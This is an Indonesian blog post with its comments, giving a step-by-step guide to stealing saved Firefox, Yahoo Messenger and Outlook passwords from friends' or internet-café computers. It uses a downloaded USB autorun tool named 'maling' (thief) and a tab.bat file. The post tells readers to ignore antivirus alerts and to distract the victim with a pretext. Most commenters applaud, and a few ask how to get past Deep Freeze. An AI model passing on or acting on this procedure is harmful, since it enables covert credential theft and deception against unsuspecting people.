| 21 comments ]

curi passwordPengen Tau password nya temen kita? atau password-password yg ke save di warnet-warnet?, hehehe..tips kali ini bisa membantu kita untuk mengambil password yg ada di komputer orang lain dengan menggunakan bantuan USB, tepatnya menggunakan Flashdisk. Cara nya sangat mudah sekali. yg pasti modal utama kita adalah Flashdisk dan komputer target yg ingin kita ambil password nya.

Tips kali ini, kita menggunakan tools yg nanti nya akan merecord (save) data pribadi dari komputer target kita. tools ini baru bisa mengambil data dari Browser Mozila Firefox, YM, dan Outlook. langsung aja ya ke step-step nya :

Langkah 1.
Download File berikut ini :

http://rapidshare.com/files/290518294/maling.rar


Langkah 2.
Setelah itu, extract file yg udah kita download diatas ke dalam USB Flashdisk kita.
ini isi dari File yg udah di download :

isi dari maling










Jika di dalam Flashdisk sudah terdapat autorun, copy and repalce aja / ganti dengan file yg dari kita download.

Program ini aman tested by Opa, jadi jika antivirus mendetect sebagai virus. ignore saja / abaikan saja.


Langkah 3.
Unplug / cabut USB flashdisk dari komputer kita, dan pergi ke komputer target.

Langkah 4.
Colok USB flashdisk kita ke Komputer korban, trs biar gk ketahuan, bilang aja. Sob, gw minta lagu MP3 yg baru-baru ya. hehehe..

Langkah 5.
Setelah itu, nanti secara automatis komputer akan menjalankan autorun. jika tidak bekerja, buka folder flashdisk kita, setelah itu klik 2x file tab.bat.
Selesai deh..semua password yg ada di firefox, YM, dan Outlook pindah secara automatis.

Langkah 6.
buka kembali USB flashdisk kita di komputer kita. jalankan 3 file yg ada di dalam folder USB kita. Foxpass, mailpass, mspass. lihat apa yg didaptkan tools ini? semua password komputer korban ter-record /tersimpan di masing2 program. Foxpass menyimpan Username dan password yg ada di Firefox. mailpass utk outlook. mspass utk YM.

Semoga bermanfaat.

Gunakanlah Secara Bijaksana


21 comments

baliplus mengatakan... @ 9 Oktober 2009 10.05

wah... wah... wah...
bukannya mencuri itu dosa???

oPa mengatakan... @ 9 Oktober 2009 10.08

@baliplus
iya mas dosa, jadikan pembelajaran aja. sebagai informasi dan pengetahuan agar kita lebih hati2..

Anonim mengatakan... @ 10 Oktober 2009 04.11

bisa2 aja nih kakak ;)

tips SEO sederhana mengatakan... @ 10 Oktober 2009 10.53

ada2 aja nech trick. tapi lumayan bagus lah...
patutu di coba nech....

hehehehehehe

tapi di coba hanya untuk pembelajaran aja koq sob

Anonim mengatakan... @ 10 Oktober 2009 15.03

fb..ma g mail bisa ndak....kekekeke

faris ! mengatakan... @ 10 Oktober 2009 16.10

terima kasih banyak , saya akan menggunakannya sebaik mungking

yeadhi, melakukan suatu kebaikan secara sederhana dan spontan :D

code4769 mengatakan... @ 10 Oktober 2009 23.26

opa... q ngopy yah??? thanks...
em... source code aplication nya ada g??
opa, mampir ke web q ya??? www.inilahjalanku.com

ajir mengatakan... @ 11 Oktober 2009 03.10

hahaha..
opa mantappp!!! inilah yang kucari-cari dari seorang blogger! :D

Lolids Personal Blog mengatakan... @ 12 Oktober 2009 01.09

Kereeen OPa Siips Mantaff lanjut terus hackingnya :)

Anonim mengatakan... @ 12 Oktober 2009 11.28

password list nya ga keliatan

oPa mengatakan... @ 12 Oktober 2009 12.16

@anonim
udah di cek belum? liat nya di aplikasi / software buatan nya om..
cth nya kl mau liat pass firefox, liat di mozila foxpass.exe

btw tu komputer pake deepfreeze gk?kl pake, saya blm bisa tembusin nya :Peace:

Anonim mengatakan... @ 16 Oktober 2009 22.01

opa, link rapid kok eror

namestatic mengatakan... @ 18 Oktober 2009 14.19

satu cara yang bijak. sepertinya menjimatkan wang dari membeli alatan usb yang dibuat bertujuan khas sebagai keylogger.

p/s: jangan fikirkan untuk menggunakan cara ini bagi mencuri password orang lain. tetapi cuba fikirkan ia sebagai langkah pengawasan untuk anak-anak. :)

rozy mengatakan... @ 7 November 2009 13.26

ini mah bukan buat pembelajaran bro
malah di gunakan oleh orang2 yg tidak bertanggung jawab dan banyak orang jadi korban di warnet2
hehehe

softwarevb mengatakan... @ 15 November 2009 11.05

thanks for sharing sob, jadi harus lebih hati-hati kalau OL di warnet. emang sih gak ada system yang aman 100%..., ada yang baik..., pasti ada juga yang buruk.

agustriy mengatakan... @ 7 Desember 2009 20.50

opa, ni bisa untuk membuka deep freeze g?
thank before

pak botak mengatakan... @ 13 Desember 2009 04.45

bang opa ko gak jalan yah program nya??
tinggal colok langsung sedot ato apa?

Anonim mengatakan... @ 28 Desember 2009 11.36

bro.. koq yg fox passnya gak ada yg nongol.. juga pas tak buka di kompi lain gak ada password yg kesimpen??

thanks banget sharenya..

dira mengatakan... @ 29 Desember 2009 00.08

mantab...numpang sedot y...
makasih

dira mengatakan... @ 29 Desember 2009 00.15

ga bisa d donlot...:(

Anonim mengatakan... @ 24 Januari 2010 10.19

arahan keluar "not singup on firefox"kenapa yer

Poskan Komentar

Related Posts Plugin for WordPress, Blogger...